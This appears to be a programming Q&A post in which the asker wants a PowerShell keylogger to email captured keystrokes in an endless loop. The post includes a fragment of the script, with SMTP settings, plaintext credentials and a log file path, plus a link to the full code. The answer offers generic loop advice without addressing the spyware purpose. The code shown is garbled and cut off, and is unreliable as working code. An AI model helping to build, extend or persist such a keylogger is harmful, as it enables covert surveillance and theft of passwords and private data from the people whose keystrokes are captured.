# why this powershell keylogger sends logs only once?

Tags: windows, powershell, github, keylogger

I have this keylogger for Powershell that sends logs to e-mail, it works perfectly but it sends the logs only once and then he stops working.
How do i make it like an endless loop?

```
TimesToRun = 2
$RunTimeP = 1
$From = "USER1@mail.com"
$Pass = "Pa$$w0rd"
$To = "USER2@mail.com"
$Subject = "Keylogger Results"
$body = "Keylogger Results"
$SMTPServer = "smtp.mail.com"
$SMTPPort = "587"
$credentials = new-object 
Management.Automation.PSCredential 
$From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)



$TimeStart = Get-Date
$TimeEnd = $timeStart.addminutes($RunTimeP)
l
function Start- 

 KeyLogger($Path="$env:temp\keylogger.txt")
```

> this is the complete script
>   https://gist.githubusercontent.com/dimiboy/8073b733f04d896cc7484fdb68bfce07/raw/d3ba1579e6be99680bee18a509a7f6940cb6a248/keystrokes-NEW.ps1

Answer (score 0):

I am putting this here since it is too long for the comment section.

This is a use case for a While loop. This is also not unique or limitation of PowerShell.

Loops are a standard use case in all programming languages and a well-documented thing.

There is built-in help to get you going.

```
Get-Help about_Foreach
Get-Help about_For
Get-Help about_While
Get-Help about_do
```

> PowerShell Loops
>
> https://social.technet.microsoft.com/wiki/contents/articles/4542.powershell-loops.aspx

You have to make a decision regarding which to use, as each have their particulars and impacts.